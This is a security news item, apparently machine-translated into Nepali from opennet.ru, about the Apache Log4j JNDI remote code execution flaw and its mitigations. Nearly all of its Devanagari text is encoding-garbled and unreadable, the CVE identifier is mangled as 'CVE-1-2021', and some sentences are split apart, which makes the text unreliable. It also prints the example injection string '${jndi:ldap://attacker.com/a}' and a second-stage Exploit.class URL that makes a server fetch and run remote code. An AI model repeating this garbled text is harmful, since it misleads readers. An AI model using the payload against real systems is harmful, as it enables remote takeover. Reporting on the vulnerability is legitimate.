рдкреНрд░реЛрд╣реЛрд╕реНрдЯрд░ > ╨С╨╗╨╛╨│ > рдЗрдиреНрдЯрд░рдиреЗрдЯ рд╕рдорд╛рдЪрд╛рд░ > Apache Log4j рдорд╛ рд╡рд┐рдирд╛рд╢рдХрд╛рд░реА рдЬреЛрдЦрд┐рдо рдзреЗрд░реИ Java рдкрд░рд┐рдпреЛрдЬрдирд╛рд╣рд░реВрд▓рд╛рдИ рдЕрд╕рд░ рдЧрд░реНрдЫ

Apache Log4j рдорд╛ рд╡рд┐рдирд╛рд╢рдХрд╛рд░реА рдЬреЛрдЦрд┐рдо рдзреЗрд░реИ Java рдкрд░рд┐рдпреЛрдЬрдирд╛рд╣рд░реВрд▓рд╛рдИ рдЕрд╕рд░ рдЧрд░реНрдЫ

Apache Log4j рдорд╛, Java рдЕрдиреБрдкреНрд░рдпреЛрдЧрд╣рд░реВрдорд╛ рд▓рдЧрд┐рдЩ рд╡реНрдпрд╡рд╕реНрдерд┐рдд рдЧрд░реНрдирдХреЛ рд▓рд╛рдЧрд┐ рдПрдХ рд▓реЛрдХрдкреНрд░рд┐рдп рдврд╛рдБрдЪрд╛, рдПрдЙрдЯрд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдЬреЛрдЦрд┐рдо рдкрд╣рд┐рдЪрд╛рди рдЧрд░рд┐рдПрдХреЛ рдЫ рдЬрд╕рд▓реЗ "{jndi:URL}" рдврд╛рдБрдЪрд╛рдорд╛ рд╡рд┐рд╢реЗрд╖ рд░реВрдкрдорд╛ рдврд╛рдБрдЪрд╛ рдЧрд░рд┐рдПрдХреЛ рдорд╛рди рд▓рдЧрдорд╛ рд▓реЗрдЦрд┐рдПрдХреЛ рдмреЗрд▓рд╛рдорд╛ рд╕реНрд╡реЗрдЪреНрдЫрд╛рдЪрд╛рд░реА рдХреЛрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрди рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫред рдЖрдХреНрд░рдордг рдЬрд╛рднрд╛ рдЕрдиреБрдкреНрд░рдпреЛрдЧрд╣рд░реВрдорд╛ рдЧрд░реНрди рд╕рдХрд┐рдиреНрдЫ рдЬреБрди рдмрд╛рд╣реНрдп рд╕реНрд░реЛрддрд╣рд░реВрдмрд╛рдЯ рдкреНрд░рд╛рдкреНрдд рдорд╛рдирд╣рд░реВ рд▓рдЧ рдЧрд░реНрджрдЫ, рдЙрджрд╛рд╣рд░рдгрдХрд╛ рд▓рд╛рдЧрд┐, рддреНрд░реБрдЯрд┐ рд╕рдиреНрджреЗрд╢рд╣рд░реВрдорд╛ рд╕рдорд╕реНрдпрд╛рдЧреНрд░рд╕реНрдд рдорд╛рдирд╣рд░реВ рдкреНрд░рджрд░реНрд╢рди рдЧрд░реНрджрд╛ред

рдпреЛ рдиреЛрдЯ рдЧрд░рд┐рдПрдХреЛ рдЫ рдХрд┐ Apache Struts, Apache Solr, Apache Druid рд╡рд╛ Apache Flink рдЬрд╕реНрддрд╛ рдлреНрд░реЗрдорд╡рд░реНрдХрд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдиреЗ рд▓рдЧрднрдЧ рд╕рдмреИ рдкрд░рд┐рдпреЛрдЬрдирд╛рд╣рд░реВ рд╕реНрдЯреАрдо, Apple iCloud, Minecraft рдЧреНрд░рд╛рд╣рдХрд╣рд░реВ рд░ рд╕рд░реНрднрд░рд╣рд░реВ рд╕рд╣рд┐рдд рд╕рдорд╕реНрдпрд╛рдмрд╛рдЯ рдкреНрд░рднрд╛рд╡рд┐рдд рдЫрдиреНред рдпреЛ рдЖрд╢рд╛ рдЧрд░рд┐рдПрдХреЛ рдЫ рдХрд┐ рдХрдордЬреЛрд░реАрд▓реЗ рдХрд░реНрдкреЛрд░реЗрдЯ рдЕрдиреБрдкреНрд░рдпреЛрдЧрд╣рд░реВрдорд╛ рдареВрд▓реЛ рдЖрдХреНрд░рдордгрдХреЛ рд▓рд╣рд░ рдирд┐рдореНрддреНрдпрд╛рдЙрди рд╕рдХреНрдЫ, Apache Struts рдлреНрд░реЗрдорд╡рд░реНрдХрдорд╛ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдХрдордЬреЛрд░реАрд╣рд░реВрдХреЛ рдЗрддрд┐рд╣рд╛рд╕ рджреЛрд╣реЛрд░реНрдпрд╛рдЙрдБрдЫ, рдЬреБрди, рдХреБрдиреИ рдирд░рд╛рдореНрд░реЛ рдЕрдиреБрдорд╛рди рдЕрдиреБрд╕рд╛рд░, Fortune рдХреЛ 65% рджреНрд╡рд╛рд░рд╛ рд╡реЗрдм рдЕрдиреБрдкреНрд░рдпреЛрдЧрд╣рд░реВрдорд╛ рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдиреНрдЫред 100 рдХрдореНрдкрдиреАрд╣рд░реВред рдХрдордЬреЛрд░ рдкреНрд░рдгрд╛рд▓реАрд╣рд░реВрдХреЛ рд▓рд╛рдЧрд┐ рдиреЗрдЯрд╡рд░реНрдХ рд╕реНрдХреНрдпрд╛рди рдЧрд░реНрдиреЗ рдкреНрд░рдпрд╛рд╕рд╣рд░реВ рд╕рд╣рд┐рддред

рдХрд╛рд░реНрдп рд╢реЛрд╖рдг рдкрд╣рд┐рд▓реЗ рдиреИ рдкреНрд░рдХрд╛рд╢рд┐рдд рднрдЗрд╕рдХреЗрдХреЛ рдЫ, рддрд░ рд╕реНрдерд┐рд░ рд╢рд╛рдЦрд╛рд╣рд░реВрдХреЛ рд▓рд╛рдЧрд┐ рд╕рдорд╛рдзрд╛рдирд╣рд░реВ рдЕрдЭреИ рд╕рдореНрдо рдХрдореНрдкрд╛рдЗрд▓ рдЧрд░рд┐рдПрдХреЛ рдЫреИрди рднрдиреНрдиреЗ рддрдереНрдпрд▓реЗ рд╕рдорд╕реНрдпрд╛ рдмрдвреЗрдХреЛ рдЫред CVE рдкрд╣рд┐рдЪрд╛рдирдХрд░реНрддрд╛ рдЕрдЭреИ рдирд┐рдпреБрдХреНрдд рдЧрд░рд┐рдПрдХреЛ рдЫреИрдиред рдлрд┐рдХреНрд╕ рдорд╛рддреНрд░ log4j-2.15.0-rc1 рдкрд░реАрдХреНрд╖рдг рд╢рд╛рдЦрд╛ рдорд╛ рд╕рдорд╛рд╡реЗрд╢ рдЫред рднреЗрджреНрдпрддрд╛рд▓рд╛рдИ рд░реЛрдХреНрдирдХреЛ рд▓рд╛рдЧрд┐ рд╕рдорд╛рдзрд╛рдирдХреЛ рд░реВрдкрдорд╛, log4j2.formatMsgNoLookups рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд▓рд╛рдИ рд╕рддреНрдпрдорд╛ рд╕реЗрдЯ рдЧрд░реНрди рд╕рд┐рдлрд╛рд░рд┐рд╕ рдЧрд░рд┐рдиреНрдЫред

log4j рд▓реЗ рд▓рдЧрдорд╛ рд▓рд╛рдЗрди рдЖрдЙрдЯрдкреБрдЯрдорд╛ рд╡рд┐рд╢реЗрд╖ рдорд╛рд╕реНрдХ "{}" рд▓рд╛рдИ рдкреНрд░рд╢реЛрдзрди рдЧрд░реНрди рд╕рдорд░реНрдерди рдЧрд░реНрджрдЫ, рдЬрд╕рдорд╛ JNDI (рдЬрд╛рднрд╛ рдирд╛рдордХрд░рдг рд░ рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реА рдЗрдиреНрдЯрд░рдлреЗрд╕) рдХреНрд╡реЗрд░реАрд╣рд░реВ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрди рд╕рдХрд┐рдиреНрдЫ рднрдиреНрдиреЗ рддрдереНрдпрд▓реЗ рдЧрд░реНрджрд╛ рд╕рдорд╕реНрдпрд╛ рдЙрддреНрдкрдиреНрди рднрдПрдХреЛ рд╣реЛред рдЖрдХреНрд░рдордг "${jndi:ldap://attacker.com/a}" рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрдирдХреЛ рд╕рд╛рде рдПрдХ рд╕реНрдЯреНрд░рд┐рдЩ рдкрд╛рд╕ рдЧрд░реНрди рддрд▓ рдЙрдмрд▓рд┐рдиреНрдЫ, рдЬреБрди log4j рд▓реЗ рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛.com рд╕рд░реНрднрд░рдорд╛ Java рдХреНрд▓рд╛рд╕рдХреЛ рдорд╛рд░реНрдЧрдХреЛ рд▓рд╛рдЧрд┐ LDAP рдЕрдиреБрд░реЛрдз рдкрдард╛рдЙрдиреЗрдЫред ред рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛рдХреЛ рд╕рд░реНрднрд░рджреНрд╡рд╛рд░рд╛ рдлрд░реНрдХрд╛рдЗрдПрдХреЛ рдорд╛рд░реНрдЧ (рдЙрджрд╛рд╣рд░рдгрдХрд╛ рд▓рд╛рдЧрд┐, http://second-stage.attacker.com/Exploit.class) рд╣рд╛рд▓рдХреЛ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдХреЛ рд╕рдиреНрджрд░реНрднрдорд╛ рд▓реЛрдб рд░ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рд╣реБрдиреЗрдЫ, рдЬрд╕рд▓реЗ рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛рд▓рд╛рдИ рд╕реНрд╡реЗрдЪреНрдЫрд╛рдЪрд╛рд░реА рдХреЛрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрди рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫред рд╡рд░реНрддрдорд╛рди рдЖрд╡реЗрджрди рдХреЛ рдЕрдзрд┐рдХрд╛рд░ рд╕рдВрдЧ рдкреНрд░рдгрд╛рд▓реАред

рдкрд░рд┐рд╢рд┐рд╖реНрдЯ рез: рднреЗрджреНрдпрддрд╛рд▓рд╛рдИ рдкрд╣рд┐рдЪрд╛рдирдХрд░реНрддрд╛ CVE-1-2021 рддреЛрдХрд┐рдПрдХреЛ рдЫред

рдкрд░рд┐рд╢рд┐рд╖реНрдЯ 2: рд░рд┐рд▓реАрдЬ log4j-2.15.0-rc1 рджреНрд╡рд╛рд░рд╛ рдердкрд┐рдПрдХреЛ рд╕реБрд░рдХреНрд╖рд╛рд▓рд╛рдИ рдмрд╛рдЗрдкрд╛рд╕ рдЧрд░реНрдиреЗ рддрд░рд┐рдХрд╛ рдкрд╣рд┐рдЪрд╛рди рдЧрд░рд┐рдПрдХреЛ рдЫред рдПрдЙрдЯрд╛ рдирдпрд╛рдБ рдЕрдкрдбреЗрдЯ, log4j-2.15.0-rc2, рдЬреЛрдЦрд┐рдо рд╡рд┐рд░реБрджреНрдз рдердк рдкреВрд░реНрдг рд╕реБрд░рдХреНрд╖рд╛рдХреЛ рд╕рд╛рде рдкреНрд░рд╕реНрддрд╛рд╡ рдЧрд░рд┐рдПрдХреЛ рдЫред рдХреЛрдбрд▓реЗ рдЧрд▓рдд рддрд░рд┐рдХрд╛рд▓реЗ рдврд╛рдБрдЪрд╛ рдЧрд░рд┐рдПрдХреЛ JNDI URL рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрд╛ рдЕрд╕рд╛рдорд╛рдиреНрдп рд╕рдорд╛рдкреНрддрд┐рдХреЛ рдЕрдиреБрдкрд╕реНрдерд┐рддрд┐рд╕рдБрдЧ рд╕рдореНрдмрдиреНрдзрд┐рдд рдкрд░рд┐рд╡рд░реНрддрдирд▓рд╛рдИ рд╣рд╛рдЗрд▓рд╛рдЗрдЯ рдЧрд░реНрджрдЫред

рд╕реНрд░реЛрдд: opennet.ru

рдПрдХ рдЯрд┐рдкреНрдкрдгреА рдердкреНрди